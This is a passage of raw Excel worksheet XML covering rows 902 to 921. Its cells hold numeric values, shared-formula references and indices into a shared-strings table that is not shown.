      <c r="A902" s="6">
        <f t="shared" si="1"/>
        <v>0.5186269774</v>
      </c>
      <c r="B902" s="29">
        <v>1.0</v>
      </c>
      <c r="C902" s="15"/>
      <c r="D902" s="14"/>
      <c r="E902" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F902" s="14"/>
      <c r="G902" s="29">
        <v>4.0</v>
      </c>
      <c r="H902" s="29">
        <v>261.0</v>
      </c>
      <c r="I902" s="29">
        <v>84100.0</v>
      </c>
      <c r="J902" s="15"/>
      <c r="K902" s="29">
        <v>84100.0</v>
      </c>
      <c r="L902" s="15"/>
      <c r="M902" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N902" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O902" s="29">
        <v>2.0</v>
      </c>
      <c r="P902" s="29">
        <v>1.0</v>
      </c>
      <c r="Q902" s="15"/>
      <c r="R902" s="15"/>
      <c r="S902" s="15"/>
      <c r="T902" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U902" s="5"/>
      <c r="V902" s="5"/>
      <c r="W902" s="47"/>
      <c r="X902" s="45"/>
      <c r="Y902" s="45"/>
      <c r="Z902" s="38" t="s">
        <v>3660</v>
      </c>
      <c r="AA902" s="39" t="s">
        <v>3661</v>
      </c>
      <c r="AB902" s="38" t="s">
        <v>3662</v>
      </c>
      <c r="AC902" s="40">
        <v>98385.0</v>
      </c>
      <c r="AD902" s="5"/>
      <c r="AE902" s="14"/>
      <c r="AF902" s="14"/>
    </row>
    <row r="903">
      <c r="A903" s="6">
        <f t="shared" si="1"/>
        <v>0.00143593573</v>
      </c>
      <c r="B903" s="29">
        <v>1.0</v>
      </c>
      <c r="C903" s="15"/>
      <c r="D903" s="14"/>
      <c r="E903" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F903" s="14"/>
      <c r="G903" s="29">
        <v>0.0</v>
      </c>
      <c r="H903" s="29">
        <v>551.0</v>
      </c>
      <c r="I903" s="29">
        <v>81951.0</v>
      </c>
      <c r="J903" s="15"/>
      <c r="K903" s="15"/>
      <c r="L903" s="15"/>
      <c r="M903" s="15"/>
      <c r="N903" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O903" s="29">
        <v>1.0</v>
      </c>
      <c r="P903" s="29">
        <v>4.0</v>
      </c>
      <c r="Q903" s="15"/>
      <c r="R903" s="15"/>
      <c r="S903" s="15"/>
      <c r="T903" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U903" s="5"/>
      <c r="V903" s="5"/>
      <c r="W903" s="47"/>
      <c r="X903" s="45"/>
      <c r="Y903" s="45"/>
      <c r="Z903" s="38" t="s">
        <v>3663</v>
      </c>
      <c r="AA903" s="39" t="s">
        <v>3664</v>
      </c>
      <c r="AB903" s="38" t="s">
        <v>3665</v>
      </c>
      <c r="AC903" s="40">
        <v>255980.0</v>
      </c>
      <c r="AD903" s="5"/>
      <c r="AE903" s="14"/>
      <c r="AF903" s="14"/>
    </row>
    <row r="904">
      <c r="A904" s="6">
        <f t="shared" si="1"/>
        <v>0.6142525107</v>
      </c>
      <c r="B904" s="29">
        <v>1.0</v>
      </c>
      <c r="C904" s="15"/>
      <c r="D904" s="14"/>
      <c r="E904" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F904" s="14"/>
      <c r="G904" s="29">
        <v>0.0</v>
      </c>
      <c r="H904" s="29">
        <v>651.0</v>
      </c>
      <c r="I904" s="29">
        <v>190293.0</v>
      </c>
      <c r="J904" s="15"/>
      <c r="K904" s="15"/>
      <c r="L904" s="15"/>
      <c r="M904" s="15"/>
      <c r="N904" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O904" s="29">
        <v>2.0</v>
      </c>
      <c r="P904" s="29">
        <v>1.0</v>
      </c>
      <c r="Q904" s="15"/>
      <c r="R904" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S904" s="15"/>
      <c r="T904" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U904" s="5"/>
      <c r="V904" s="5"/>
      <c r="W904" s="47"/>
      <c r="X904" s="45"/>
      <c r="Y904" s="45"/>
      <c r="Z904" s="38" t="s">
        <v>3666</v>
      </c>
      <c r="AA904" s="39" t="s">
        <v>3667</v>
      </c>
      <c r="AB904" s="38" t="s">
        <v>3668</v>
      </c>
      <c r="AC904" s="40">
        <v>201306.0</v>
      </c>
      <c r="AD904" s="5"/>
      <c r="AE904" s="14"/>
      <c r="AF904" s="14"/>
    </row>
    <row r="905">
      <c r="A905" s="6">
        <f t="shared" si="1"/>
        <v>0.394728963</v>
      </c>
      <c r="B905" s="29">
        <v>1.0</v>
      </c>
      <c r="C905" s="29">
        <v>88930.0</v>
      </c>
      <c r="D905" s="14"/>
      <c r="E905" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F905" s="14"/>
      <c r="G905" s="29">
        <v>0.0</v>
      </c>
      <c r="H905" s="29">
        <v>378.0</v>
      </c>
      <c r="I905" s="29">
        <v>76199.0</v>
      </c>
      <c r="J905" s="15"/>
      <c r="K905" s="29">
        <v>76199.0</v>
      </c>
      <c r="L905" s="15"/>
      <c r="M905" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N905" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O905" s="29">
        <v>2.0</v>
      </c>
      <c r="P905" s="29">
        <v>2.0</v>
      </c>
      <c r="Q905" s="15"/>
      <c r="R905" s="15"/>
      <c r="S905" s="15"/>
      <c r="T905" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U905" s="5"/>
      <c r="V905" s="5"/>
      <c r="W905" s="47"/>
      <c r="X905" s="45"/>
      <c r="Y905" s="45"/>
      <c r="Z905" s="38" t="s">
        <v>3669</v>
      </c>
      <c r="AA905" s="39" t="s">
        <v>3670</v>
      </c>
      <c r="AB905" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC905" s="40">
        <v>88899.0</v>
      </c>
      <c r="AD905" s="5"/>
      <c r="AE905" s="14"/>
      <c r="AF905" s="14"/>
    </row>
    <row r="906">
      <c r="A906" s="6">
        <f t="shared" si="1"/>
        <v>0.8694838626</v>
      </c>
      <c r="B906" s="29">
        <v>1.0</v>
      </c>
      <c r="C906" s="15"/>
      <c r="D906" s="14"/>
      <c r="E906" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F906" s="14"/>
      <c r="G906" s="29">
        <v>2.0</v>
      </c>
      <c r="H906" s="29">
        <v>710.0</v>
      </c>
      <c r="I906" s="29">
        <v>118815.0</v>
      </c>
      <c r="J906" s="15"/>
      <c r="K906" s="29">
        <v>12.0</v>
      </c>
      <c r="L906" s="14"/>
      <c r="M906" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N906" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O906" s="29">
        <v>2.0</v>
      </c>
      <c r="P906" s="29">
        <v>6.0</v>
      </c>
      <c r="Q906" s="15"/>
      <c r="R906" s="15"/>
      <c r="S906" s="15"/>
      <c r="T906" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U906" s="5"/>
      <c r="V906" s="5"/>
      <c r="W906" s="47"/>
      <c r="X906" s="45"/>
      <c r="Y906" s="45"/>
      <c r="Z906" s="38" t="s">
        <v>3671</v>
      </c>
      <c r="AA906" s="39" t="s">
        <v>3672</v>
      </c>
      <c r="AB906" s="38" t="s">
        <v>1718</v>
      </c>
      <c r="AC906" s="40">
        <v>131277.0</v>
      </c>
      <c r="AD906" s="5"/>
      <c r="AE906" s="14"/>
      <c r="AF906" s="14"/>
    </row>
    <row r="907">
      <c r="A907" s="6">
        <f t="shared" si="1"/>
        <v>0.7961166291</v>
      </c>
      <c r="B907" s="29">
        <v>1.0</v>
      </c>
      <c r="C907" s="29">
        <v>195611.0</v>
      </c>
      <c r="D907" s="14"/>
      <c r="E907" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F907" s="14"/>
      <c r="G907" s="29">
        <v>2.0</v>
      </c>
      <c r="H907" s="29">
        <v>340.0</v>
      </c>
      <c r="I907" s="29">
        <v>188709.0</v>
      </c>
      <c r="J907" s="15"/>
      <c r="K907" s="29">
        <v>188709.0</v>
      </c>
      <c r="L907" s="15"/>
      <c r="M907" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N907" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O907" s="29">
        <v>2.0</v>
      </c>
      <c r="P907" s="29">
        <v>0.0</v>
      </c>
      <c r="Q907" s="15"/>
      <c r="R907" s="15"/>
      <c r="S907" s="15"/>
      <c r="T907" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U907" s="5"/>
      <c r="V907" s="5"/>
      <c r="W907" s="47"/>
      <c r="X907" s="45"/>
      <c r="Y907" s="45"/>
      <c r="Z907" s="38" t="s">
        <v>3673</v>
      </c>
      <c r="AA907" s="39" t="s">
        <v>3674</v>
      </c>
      <c r="AB907" s="38" t="s">
        <v>3675</v>
      </c>
      <c r="AC907" s="40">
        <v>195600.0</v>
      </c>
      <c r="AD907" s="5"/>
      <c r="AE907" s="14"/>
      <c r="AF907" s="14"/>
    </row>
    <row r="908">
      <c r="A908" s="6">
        <f t="shared" si="1"/>
        <v>0.7981719492</v>
      </c>
      <c r="B908" s="29">
        <v>1.0</v>
      </c>
      <c r="C908" s="29">
        <v>132999.0</v>
      </c>
      <c r="D908" s="14"/>
      <c r="E908" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F908" s="14"/>
      <c r="G908" s="29">
        <v>6.0</v>
      </c>
      <c r="H908" s="29">
        <v>5030.0</v>
      </c>
      <c r="I908" s="29">
        <v>7474.0</v>
      </c>
      <c r="J908" s="15"/>
      <c r="K908" s="29">
        <v>-1.0</v>
      </c>
      <c r="L908" s="15"/>
      <c r="M908" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N908" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O908" s="29">
        <v>2.0</v>
      </c>
      <c r="P908" s="29">
        <v>2.0</v>
      </c>
      <c r="Q908" s="15"/>
      <c r="R908" s="15"/>
      <c r="S908" s="15"/>
      <c r="T908" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U908" s="5"/>
      <c r="V908" s="5"/>
      <c r="W908" s="47"/>
      <c r="X908" s="45"/>
      <c r="Y908" s="45"/>
      <c r="Z908" s="38" t="s">
        <v>3676</v>
      </c>
      <c r="AA908" s="39" t="s">
        <v>3677</v>
      </c>
      <c r="AB908" s="38" t="s">
        <v>3678</v>
      </c>
      <c r="AC908" s="40">
        <v>131533.0</v>
      </c>
      <c r="AD908" s="5"/>
      <c r="AE908" s="14"/>
      <c r="AF908" s="14"/>
    </row>
    <row r="909">
      <c r="A909" s="6">
        <f t="shared" si="1"/>
        <v>0.8142524174</v>
      </c>
      <c r="B909" s="29">
        <v>1.0</v>
      </c>
      <c r="C909" s="14"/>
      <c r="D909" s="14"/>
      <c r="E909" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F909" s="14"/>
      <c r="G909" s="29">
        <v>74.0</v>
      </c>
      <c r="H909" s="29">
        <v>17812.0</v>
      </c>
      <c r="I909" s="29">
        <v>119035.0</v>
      </c>
      <c r="J909" s="15"/>
      <c r="K909" s="15"/>
      <c r="L909" s="15"/>
      <c r="M909" s="15"/>
      <c r="N909" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O909" s="29">
        <v>12.0</v>
      </c>
      <c r="P909" s="29">
        <v>17.0</v>
      </c>
      <c r="Q909" s="15"/>
      <c r="R909" s="15"/>
      <c r="S909" s="15"/>
      <c r="T909" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U909" s="5"/>
      <c r="V909" s="5"/>
      <c r="W909" s="47"/>
      <c r="X909" s="45"/>
      <c r="Y909" s="45"/>
      <c r="Z909" s="38" t="s">
        <v>3679</v>
      </c>
      <c r="AA909" s="39" t="s">
        <v>3680</v>
      </c>
      <c r="AB909" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC909" s="40">
        <v>169782.0</v>
      </c>
      <c r="AD909" s="5"/>
      <c r="AE909" s="14"/>
      <c r="AF909" s="14"/>
    </row>
    <row r="910">
      <c r="A910" s="6">
        <f t="shared" si="1"/>
        <v>0.8199178395</v>
      </c>
      <c r="B910" s="29">
        <v>1.0</v>
      </c>
      <c r="C910" s="29">
        <v>82429.0</v>
      </c>
      <c r="D910" s="14"/>
      <c r="E910" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F910" s="14"/>
      <c r="G910" s="29">
        <v>3.0</v>
      </c>
      <c r="H910" s="29">
        <v>2009.0</v>
      </c>
      <c r="I910" s="29">
        <v>3643.0</v>
      </c>
      <c r="J910" s="15"/>
      <c r="K910" s="29">
        <v>3643.0</v>
      </c>
      <c r="L910" s="15"/>
      <c r="M910" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N910" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O910" s="29">
        <v>1.0</v>
      </c>
      <c r="P910" s="29">
        <v>2.0</v>
      </c>
      <c r="Q910" s="15"/>
      <c r="R910" s="15"/>
      <c r="S910" s="15"/>
      <c r="T910" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U910" s="5"/>
      <c r="V910" s="5"/>
      <c r="W910" s="47"/>
      <c r="X910" s="45"/>
      <c r="Y910" s="45"/>
      <c r="Z910" s="38" t="s">
        <v>3681</v>
      </c>
      <c r="AA910" s="39" t="s">
        <v>3682</v>
      </c>
      <c r="AB910" s="38" t="s">
        <v>3683</v>
      </c>
      <c r="AC910" s="40">
        <v>82428.0</v>
      </c>
      <c r="AD910" s="5"/>
      <c r="AE910" s="14"/>
      <c r="AF910" s="14"/>
    </row>
    <row r="911">
      <c r="A911" s="6">
        <f t="shared" si="1"/>
        <v>0.9028816155</v>
      </c>
      <c r="B911" s="29">
        <v>1.0</v>
      </c>
      <c r="C911" s="15"/>
      <c r="D911" s="14"/>
      <c r="E911" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F911" s="14"/>
      <c r="G911" s="29">
        <v>9.0</v>
      </c>
      <c r="H911" s="29">
        <v>1341.0</v>
      </c>
      <c r="I911" s="29">
        <v>35363.0</v>
      </c>
      <c r="J911" s="15"/>
      <c r="K911" s="29">
        <v>-1.0</v>
      </c>
      <c r="L911" s="15"/>
      <c r="M911" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N911" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O911" s="29">
        <v>1.0</v>
      </c>
      <c r="P911" s="29">
        <v>2.0</v>
      </c>
      <c r="Q911" s="15"/>
      <c r="R911" s="15"/>
      <c r="S911" s="15"/>
      <c r="T911" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U911" s="5"/>
      <c r="V911" s="5"/>
      <c r="W911" s="47"/>
      <c r="X911" s="45"/>
      <c r="Y911" s="45"/>
      <c r="Z911" s="38" t="s">
        <v>3684</v>
      </c>
      <c r="AA911" s="39" t="s">
        <v>3685</v>
      </c>
      <c r="AB911" s="38" t="s">
        <v>3686</v>
      </c>
      <c r="AC911" s="40">
        <v>90518.0</v>
      </c>
      <c r="AD911" s="5"/>
      <c r="AE911" s="14"/>
      <c r="AF911" s="14"/>
    </row>
    <row r="912">
      <c r="A912" s="6">
        <f t="shared" si="1"/>
        <v>0.1532750063</v>
      </c>
      <c r="B912" s="29">
        <v>1.0</v>
      </c>
      <c r="C912" s="29">
        <v>67508.0</v>
      </c>
      <c r="D912" s="14"/>
      <c r="E912" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F912" s="14"/>
      <c r="G912" s="29">
        <v>1.0</v>
      </c>
      <c r="H912" s="29">
        <v>216.0</v>
      </c>
      <c r="I912" s="29">
        <v>15047.0</v>
      </c>
      <c r="J912" s="15"/>
      <c r="K912" s="15"/>
      <c r="L912" s="15"/>
      <c r="M912" s="14"/>
      <c r="N912" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O912" s="29">
        <v>1.0</v>
      </c>
      <c r="P912" s="29">
        <v>2.0</v>
      </c>
      <c r="Q912" s="15"/>
      <c r="R912" s="15"/>
      <c r="S912" s="15"/>
      <c r="T912" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U912" s="5"/>
      <c r="V912" s="5"/>
      <c r="W912" s="47"/>
      <c r="X912" s="45"/>
      <c r="Y912" s="45"/>
      <c r="Z912" s="38" t="s">
        <v>3687</v>
      </c>
      <c r="AA912" s="39" t="s">
        <v>3688</v>
      </c>
      <c r="AB912" s="38" t="s">
        <v>3689</v>
      </c>
      <c r="AC912" s="40">
        <v>67507.0</v>
      </c>
      <c r="AD912" s="5"/>
      <c r="AE912" s="14"/>
      <c r="AF912" s="14"/>
    </row>
    <row r="913">
      <c r="A913" s="6">
        <f t="shared" si="1"/>
        <v>0.7350816037</v>
      </c>
      <c r="B913" s="29">
        <v>1.0</v>
      </c>
      <c r="C913" s="29">
        <v>205448.0</v>
      </c>
      <c r="D913" s="14"/>
      <c r="E913" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F913" s="14"/>
      <c r="G913" s="29">
        <v>2.0</v>
      </c>
      <c r="H913" s="29">
        <v>532.0</v>
      </c>
      <c r="I913" s="29">
        <v>49513.0</v>
      </c>
      <c r="J913" s="15"/>
      <c r="K913" s="29">
        <v>-1.0</v>
      </c>
      <c r="L913" s="15"/>
      <c r="M913" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N913" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O913" s="29">
        <v>1.0</v>
      </c>
      <c r="P913" s="29">
        <v>0.0</v>
      </c>
      <c r="Q913" s="15"/>
      <c r="R913" s="15"/>
      <c r="S913" s="15"/>
      <c r="T913" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U913" s="5"/>
      <c r="V913" s="5"/>
      <c r="W913" s="47"/>
      <c r="X913" s="45"/>
      <c r="Y913" s="45"/>
      <c r="Z913" s="38" t="s">
        <v>3690</v>
      </c>
      <c r="AA913" s="39" t="s">
        <v>3691</v>
      </c>
      <c r="AB913" s="38" t="s">
        <v>3692</v>
      </c>
      <c r="AC913" s="40">
        <v>205437.0</v>
      </c>
      <c r="AD913" s="5"/>
      <c r="AE913" s="14"/>
      <c r="AF913" s="14"/>
    </row>
    <row r="914">
      <c r="A914" s="6">
        <f t="shared" si="1"/>
        <v>0.1406656209</v>
      </c>
      <c r="B914" s="29">
        <v>1.0</v>
      </c>
      <c r="C914" s="29">
        <v>118774.0</v>
      </c>
      <c r="D914" s="14"/>
      <c r="E914" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F914" s="14"/>
      <c r="G914" s="29">
        <v>16.0</v>
      </c>
      <c r="H914" s="29">
        <v>1469.0</v>
      </c>
      <c r="I914" s="29">
        <v>105821.0</v>
      </c>
      <c r="J914" s="15"/>
      <c r="K914" s="29">
        <v>105821.0</v>
      </c>
      <c r="L914" s="15"/>
      <c r="M914" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N914" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O914" s="29">
        <v>2.0</v>
      </c>
      <c r="P914" s="29">
        <v>1.0</v>
      </c>
      <c r="Q914" s="15"/>
      <c r="R914" s="15"/>
      <c r="S914" s="15"/>
      <c r="T914" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U914" s="5"/>
      <c r="V914" s="5"/>
      <c r="W914" s="47"/>
      <c r="X914" s="45"/>
      <c r="Y914" s="45"/>
      <c r="Z914" s="38" t="s">
        <v>3693</v>
      </c>
      <c r="AA914" s="39" t="s">
        <v>3694</v>
      </c>
      <c r="AB914" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC914" s="40">
        <v>118772.0</v>
      </c>
      <c r="AD914" s="5"/>
      <c r="AE914" s="14"/>
      <c r="AF914" s="14"/>
    </row>
    <row r="915">
      <c r="A915" s="6">
        <f t="shared" si="1"/>
        <v>0.4389385117</v>
      </c>
      <c r="B915" s="29">
        <v>1.0</v>
      </c>
      <c r="C915" s="15"/>
      <c r="D915" s="14"/>
      <c r="E915" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F915" s="14"/>
      <c r="G915" s="29">
        <v>2.0</v>
      </c>
      <c r="H915" s="29">
        <v>252.0</v>
      </c>
      <c r="I915" s="29">
        <v>217508.0</v>
      </c>
      <c r="J915" s="15"/>
      <c r="K915" s="29">
        <v>6253.0</v>
      </c>
      <c r="L915" s="15"/>
      <c r="M915" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N915" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O915" s="29">
        <v>2.0</v>
      </c>
      <c r="P915" s="29">
        <v>1.0</v>
      </c>
      <c r="Q915" s="15"/>
      <c r="R915" s="15"/>
      <c r="S915" s="15"/>
      <c r="T915" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U915" s="5"/>
      <c r="V915" s="5"/>
      <c r="W915" s="47"/>
      <c r="X915" s="45"/>
      <c r="Y915" s="45"/>
      <c r="Z915" s="38" t="s">
        <v>3695</v>
      </c>
      <c r="AA915" s="39" t="s">
        <v>3696</v>
      </c>
      <c r="AB915" s="38" t="s">
        <v>3697</v>
      </c>
      <c r="AC915" s="40">
        <v>267680.0</v>
      </c>
      <c r="AD915" s="5"/>
      <c r="AE915" s="14"/>
      <c r="AF915" s="14"/>
    </row>
    <row r="916">
      <c r="A916" s="6">
        <f t="shared" si="1"/>
        <v>0.3950045515</v>
      </c>
      <c r="B916" s="29">
        <v>1.0</v>
      </c>
      <c r="C916" s="29">
        <v>70687.0</v>
      </c>
      <c r="D916" s="14"/>
      <c r="E916" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F916" s="14"/>
      <c r="G916" s="29">
        <v>0.0</v>
      </c>
      <c r="H916" s="29">
        <v>239.0</v>
      </c>
      <c r="I916" s="29">
        <v>58618.0</v>
      </c>
      <c r="J916" s="15"/>
      <c r="K916" s="29">
        <v>58618.0</v>
      </c>
      <c r="L916" s="15"/>
      <c r="M916" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N916" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O916" s="29">
        <v>2.0</v>
      </c>
      <c r="P916" s="29">
        <v>2.0</v>
      </c>
      <c r="Q916" s="15"/>
      <c r="R916" s="15"/>
      <c r="S916" s="15"/>
      <c r="T916" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U916" s="5"/>
      <c r="V916" s="5"/>
      <c r="W916" s="47"/>
      <c r="X916" s="45"/>
      <c r="Y916" s="45"/>
      <c r="Z916" s="38" t="s">
        <v>3698</v>
      </c>
      <c r="AA916" s="39" t="s">
        <v>3699</v>
      </c>
      <c r="AB916" s="38" t="s">
        <v>3700</v>
      </c>
      <c r="AC916" s="40">
        <v>70684.0</v>
      </c>
      <c r="AD916" s="5"/>
      <c r="AE916" s="14"/>
      <c r="AF916" s="14"/>
    </row>
    <row r="917">
      <c r="A917" s="6">
        <f t="shared" si="1"/>
        <v>0.5284197211</v>
      </c>
      <c r="B917" s="29">
        <v>1.0</v>
      </c>
      <c r="C917" s="29">
        <v>61638.0</v>
      </c>
      <c r="D917" s="14"/>
      <c r="E917" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F917" s="14"/>
      <c r="G917" s="29">
        <v>0.0</v>
      </c>
      <c r="H917" s="29">
        <v>445.0</v>
      </c>
      <c r="I917" s="29">
        <v>49763.0</v>
      </c>
      <c r="J917" s="15"/>
      <c r="K917" s="15"/>
      <c r="L917" s="15"/>
      <c r="M917" s="14"/>
      <c r="N917" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O917" s="29">
        <v>2.0</v>
      </c>
      <c r="P917" s="29">
        <v>1.0</v>
      </c>
      <c r="Q917" s="15"/>
      <c r="R917" s="15"/>
      <c r="S917" s="15"/>
      <c r="T917" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U917" s="5"/>
      <c r="V917" s="5"/>
      <c r="W917" s="47"/>
      <c r="X917" s="45"/>
      <c r="Y917" s="45"/>
      <c r="Z917" s="38" t="s">
        <v>3701</v>
      </c>
      <c r="AA917" s="39" t="s">
        <v>3702</v>
      </c>
      <c r="AB917" s="38" t="s">
        <v>1296</v>
      </c>
      <c r="AC917" s="40">
        <v>61629.0</v>
      </c>
      <c r="AD917" s="5"/>
      <c r="AE917" s="14"/>
      <c r="AF917" s="14"/>
    </row>
    <row r="918">
      <c r="A918" s="6">
        <f t="shared" si="1"/>
        <v>0.2372220548</v>
      </c>
      <c r="B918" s="29">
        <v>1.0</v>
      </c>
      <c r="C918" s="14"/>
      <c r="D918" s="14"/>
      <c r="E918" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F918" s="14"/>
      <c r="G918" s="29">
        <v>1.0</v>
      </c>
      <c r="H918" s="29">
        <v>136.0</v>
      </c>
      <c r="I918" s="29">
        <v>150537.0</v>
      </c>
      <c r="J918" s="15"/>
      <c r="K918" s="15"/>
      <c r="L918" s="15"/>
      <c r="M918" s="15"/>
      <c r="N918" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O918" s="29">
        <v>0.0</v>
      </c>
      <c r="P918" s="29">
        <v>2.0</v>
      </c>
      <c r="Q918" s="15"/>
      <c r="R918" s="15"/>
      <c r="S918" s="15"/>
      <c r="T918" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U918" s="5"/>
      <c r="V918" s="5"/>
      <c r="W918" s="47"/>
      <c r="X918" s="45"/>
      <c r="Y918" s="45"/>
      <c r="Z918" s="38" t="s">
        <v>3703</v>
      </c>
      <c r="AA918" s="39" t="s">
        <v>3704</v>
      </c>
      <c r="AB918" s="38" t="s">
        <v>3705</v>
      </c>
      <c r="AC918" s="40">
        <v>255603.0</v>
      </c>
      <c r="AD918" s="5"/>
      <c r="AE918" s="14"/>
      <c r="AF918" s="14"/>
    </row>
    <row r="919">
      <c r="A919" s="6">
        <f t="shared" si="1"/>
        <v>0.4230202654</v>
      </c>
      <c r="B919" s="29">
        <v>1.0</v>
      </c>
      <c r="C919" s="15"/>
      <c r="D919" s="14"/>
      <c r="E919" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F919" s="14"/>
      <c r="G919" s="29">
        <v>1.0</v>
      </c>
      <c r="H919" s="29">
        <v>1430.0</v>
      </c>
      <c r="I919" s="29">
        <v>21874.0</v>
      </c>
      <c r="J919" s="15"/>
      <c r="K919" s="29">
        <v>36538.0</v>
      </c>
      <c r="L919" s="15"/>
      <c r="M919" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N919" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O919" s="29">
        <v>3.0</v>
      </c>
      <c r="P919" s="29">
        <v>0.0</v>
      </c>
      <c r="Q919" s="15"/>
      <c r="R919" s="15"/>
      <c r="S919" s="15"/>
      <c r="T919" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U919" s="5"/>
      <c r="V919" s="5"/>
      <c r="W919" s="47"/>
      <c r="X919" s="45"/>
      <c r="Y919" s="45"/>
      <c r="Z919" s="38" t="s">
        <v>3706</v>
      </c>
      <c r="AA919" s="39" t="s">
        <v>3707</v>
      </c>
      <c r="AB919" s="38" t="s">
        <v>3708</v>
      </c>
      <c r="AC919" s="40">
        <v>32443.0</v>
      </c>
      <c r="AD919" s="5"/>
      <c r="AE919" s="14"/>
      <c r="AF919" s="14"/>
    </row>
    <row r="920">
      <c r="A920" s="6">
        <f t="shared" si="1"/>
        <v>0.309559967</v>
      </c>
      <c r="B920" s="29">
        <v>1.0</v>
      </c>
      <c r="C920" s="15"/>
      <c r="D920" s="14"/>
      <c r="E920" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F920" s="14"/>
      <c r="G920" s="29">
        <v>6.0</v>
      </c>
      <c r="H920" s="29">
        <v>3989.0</v>
      </c>
      <c r="I920" s="29">
        <v>64351.0</v>
      </c>
      <c r="J920" s="15"/>
      <c r="K920" s="29">
        <v>6253.0</v>
      </c>
      <c r="L920" s="15"/>
      <c r="M920" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N920" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O920" s="29">
        <v>1.0</v>
      </c>
      <c r="P920" s="29">
        <v>1.0</v>
      </c>
      <c r="Q920" s="15"/>
      <c r="R920" s="15"/>
      <c r="S920" s="15"/>
      <c r="T920" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U920" s="5"/>
      <c r="V920" s="5"/>
      <c r="W920" s="47"/>
      <c r="X920" s="45"/>
      <c r="Y920" s="45"/>
      <c r="Z920" s="38" t="s">
        <v>3709</v>
      </c>
      <c r="AA920" s="39" t="s">
        <v>3710</v>
      </c>
      <c r="AB920" s="38" t="s">
        <v>3711</v>
      </c>
      <c r="AC920" s="40">
        <v>97683.0</v>
      </c>
      <c r="AD920" s="5"/>
      <c r="AE920" s="14"/>
      <c r="AF920" s="14"/>
    </row>
    <row r="921">
      <c r="A921" s="6">
        <f t="shared" si="1"/>
        <v>0.2469446346</v>
      </c>
      <c r="B921" s="29">
        <v>1.0</v>
      </c>
      <c r="C921" s="15"/>
      <c r="D921" s="14"/>
      <c r="E921" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F921" s="14"/>
      <c r="G921" s="29">
        <v>0.0</v>
      </c>
      <c r="H921" s="29">
        <v>232.0</v>
      </c>
      <c r="I921" s="29">
        <v>110848.0</v>
      </c>
      <c r="J921" s="15"/>
      <c r="K921" s="29">
        <v>110848.0</v>
      </c>
      <c r="L921" s="15"/>
      <c r="M921" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N921" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O921" s="29">
        <v>1.0</v>
      </c>
      <c r="P921" s="29">
        <v>4.0</v>
      </c>
      <c r="Q921" s="15"/>
      <c r="R921" s="15"/>
      <c r="S921" s="15"/>
      <c r="T921" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U921" s="5"/>
